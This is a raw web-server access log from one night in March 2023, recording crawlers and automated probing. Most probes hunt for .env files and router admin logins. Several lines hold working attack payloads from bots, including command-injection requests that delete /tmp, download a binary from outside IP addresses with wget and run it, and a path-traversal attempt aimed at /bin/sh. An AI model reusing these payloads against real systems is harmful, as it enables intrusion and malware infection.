54.194.188.153 - - [03/Mar/2023:01:13:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
172.104.131.24 - - [03/Mar/2023:01:13:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.49 - - [03/Mar/2023:01:13:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
43.129.219.189 - - [03/Mar/2023:01:16:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.129.219.189 - - [03/Mar/2023:01:16:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
20.231.59.48 - - [03/Mar/2023:01:21:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.59.48 - - [03/Mar/2023:01:21:41 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:01:22:14 +0100] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:01:22:14 +0100] "POST /app HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
42.224.194.0 - - [03/Mar/2023:01:22:46 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
27.74.240.14 - - [03/Mar/2023:01:23:30 +0100] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [03/Mar/2023:01:23:31 +0100] "POST /apps HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:01:23:35 +0100] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:01:23:35 +0100] "POST /app HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:01:24:28 +0100] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.132 - - [03/Mar/2023:01:24:29 +0100] "POST /app HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
151.242.92.66 - - [03/Mar/2023:01:28:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.84.165.22 - - [03/Mar/2023:01:32:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
51.158.37.156 - - [03/Mar/2023:01:34:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:01:34:25 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
54.36.148.88 - - [03/Mar/2023:01:36:01 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.129 - - [03/Mar/2023:01:36:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
27.74.240.14 - - [03/Mar/2023:01:36:24 +0100] "GET /protected/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [03/Mar/2023:01:36:24 +0100] "POST /protected HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:01:37:32 +0100] "GET /main/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:01:37:32 +0100] "POST /main HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:01:37:38 +0100] "GET /main/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:01:37:39 +0100] "POST /main HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:01:39:35 +0100] "GET /main/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.16.142.230 - - [03/Mar/2023:01:39:36 +0100] "POST /main HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
194.87.151.116 - - [03/Mar/2023:01:43:10 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
188.166.146.77 - - [03/Mar/2023:01:48:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.166.146.77 - - [03/Mar/2023:01:48:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.166.146.77 - - [03/Mar/2023:01:48:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.146.77 - - [03/Mar/2023:01:48:31 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.176 - - [03/Mar/2023:01:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
188.165.87.98 - - [03/Mar/2023:01:50:30 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
64.62.197.178 - - [03/Mar/2023:01:51:09 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
64.62.197.168 - - [03/Mar/2023:01:52:41 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
4.1.229.86 - - [03/Mar/2023:01:53:32 +0100] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [03/Mar/2023:01:53:32 +0100] "POST /laravel HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.252.102.96 - - [03/Mar/2023:01:54:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
193.32.162.159 - - [03/Mar/2023:01:56:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
109.237.97.180 - - [03/Mar/2023:02:02:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.97.180 - - [03/Mar/2023:02:02:44 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
79.110.62.172 - - [03/Mar/2023:02:03:57 +0100] "GET /explore HTTP/1.1" 404 312 "-" "SonyEricssonT68/R201A"
91.126.226.220 - - [03/Mar/2023:02:06:03 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.126.226.220 - - [03/Mar/2023:02:06:03 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
194.87.151.116 - - [03/Mar/2023:02:06:23 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
194.87.151.116 - - [03/Mar/2023:02:07:31 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
69.194.182.218 - - [03/Mar/2023:02:07:39 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.194.182.218 - - [03/Mar/2023:02:07:39 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.105.25.184 - - [03/Mar/2023:02:08:02 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
188.165.87.106 - - [03/Mar/2023:02:09:52 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
41.251.249.88 - - [03/Mar/2023:02:12:02 +0100] "GET /protected/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [03/Mar/2023:02:12:03 +0100] "POST /protected HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Mar/2023:02:12:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
120.85.112.142 - - [03/Mar/2023:02:13:57 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
80.66.66.112 - - [03/Mar/2023:02:16:10 +0100] "\x03" 501 316 "-" "-"
193.32.162.159 - - [03/Mar/2023:02:16:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.76.96.55 - - [03/Mar/2023:02:18:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
193.32.162.159 - - [03/Mar/2023:02:19:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [03/Mar/2023:02:19:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [03/Mar/2023:02:20:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
188.233.97.233 - - [03/Mar/2023:02:21:39 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
172.105.9.152 - - [03/Mar/2023:02:23:05 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
34.76.158.233 - - [03/Mar/2023:02:27:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
167.94.138.120 - - [03/Mar/2023:02:28:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.120 - - [03/Mar/2023:02:28:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.120 - - [03/Mar/2023:02:28:49 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.120 - - [03/Mar/2023:02:28:49 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
130.211.54.158 - - [03/Mar/2023:02:36:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
69.244.154.231 - - [03/Mar/2023:02:36:36 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [03/Mar/2023:02:36:36 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.195.93.98 - - [03/Mar/2023:02:36:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
69.244.154.231 - - [03/Mar/2023:02:37:49 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [03/Mar/2023:02:37:49 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [03/Mar/2023:02:38:38 +0100] "GET /www/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.244.154.231 - - [03/Mar/2023:02:38:38 +0100] "POST /www HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
89.148.11.222 - - [03/Mar/2023:02:40:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
74.105.17.128 - - [03/Mar/2023:02:40:56 +0100] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
74.105.17.128 - - [03/Mar/2023:02:40:59 +0100] "POST /core HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.158.37.156 - - [03/Mar/2023:02:44:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:02:44:15 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
155.12.94.36 - - [03/Mar/2023:02:44:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.233.62.116 - - [03/Mar/2023:02:44:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
89.148.11.222 - - [03/Mar/2023:02:47:08 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
186.178.108.202 - - [03/Mar/2023:02:48:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
59.97.168.181 - - [03/Mar/2023:02:50:11 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
36.93.129.133 - - [03/Mar/2023:02:51:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
65.141.6.170 - - [03/Mar/2023:02:53:03 +0100] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [03/Mar/2023:02:53:04 +0100] "POST /docs HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.104.131.24 - - [03/Mar/2023:02:54:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.32.162.159 - - [03/Mar/2023:02:54:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [03/Mar/2023:02:55:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.66.164.26 - - [03/Mar/2023:02:56:16 +0100] "GET /redmine/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Mar/2023:02:56:16 +0100] "POST /redmine HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
164.92.196.247 - - [03/Mar/2023:03:07:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.92.196.247 - - [03/Mar/2023:03:07:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
164.92.196.247 - - [03/Mar/2023:03:07:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
164.92.196.247 - - [03/Mar/2023:03:07:35 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
69.61.242.98 - - [03/Mar/2023:03:10:18 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.61.242.98 - - [03/Mar/2023:03:10:19 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [03/Mar/2023:03:10:31 +0100] "GET /cgi-bin/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [03/Mar/2023:03:10:32 +0100] "POST /cgi-bin HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [03/Mar/2023:03:10:41 +0100] "GET /shared/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [03/Mar/2023:03:10:42 +0100] "POST /shared HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.61.242.98 - - [03/Mar/2023:03:12:09 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.61.242.98 - - [03/Mar/2023:03:12:10 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.61.242.98 - - [03/Mar/2023:03:13:26 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.61.242.98 - - [03/Mar/2023:03:13:26 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
209.201.15.190 - - [03/Mar/2023:03:27:38 +0100] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
209.201.15.190 - - [03/Mar/2023:03:27:38 +0100] "POST /docs HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.225.74.55 - - [03/Mar/2023:03:30:46 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
193.32.162.159 - - [03/Mar/2023:03:33:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
143.110.186.145 - - [03/Mar/2023:03:38:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.110.186.145 - - [03/Mar/2023:03:38:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.110.186.145 - - [03/Mar/2023:03:38:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
143.110.186.145 - - [03/Mar/2023:03:38:09 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
193.32.162.159 - - [03/Mar/2023:03:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.66.164.26 - - [03/Mar/2023:03:39:34 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
68.66.164.26 - - [03/Mar/2023:03:39:34 +0100] "POST /wp-admin HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
143.110.186.145 - - [03/Mar/2023:03:43:13 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.110.186.145 - - [03/Mar/2023:03:43:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.110.186.145 - - [03/Mar/2023:03:43:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
143.110.186.145 - - [03/Mar/2023:03:43:14 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
193.32.162.159 - - [03/Mar/2023:03:47:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.210.207.202 - - [03/Mar/2023:03:51:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:03:54:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:03:54:39 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
91.126.226.220 - - [03/Mar/2023:03:55:35 +0100] "GET /web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.126.226.220 - - [03/Mar/2023:03:55:36 +0100] "POST /web HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.158.37.156 - - [03/Mar/2023:03:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [03/Mar/2023:03:55:54 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
193.32.162.159 - - [03/Mar/2023:03:56:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.34.146.227 - - [03/Mar/2023:03:59:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
198.235.24.9 - - [03/Mar/2023:04:01:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
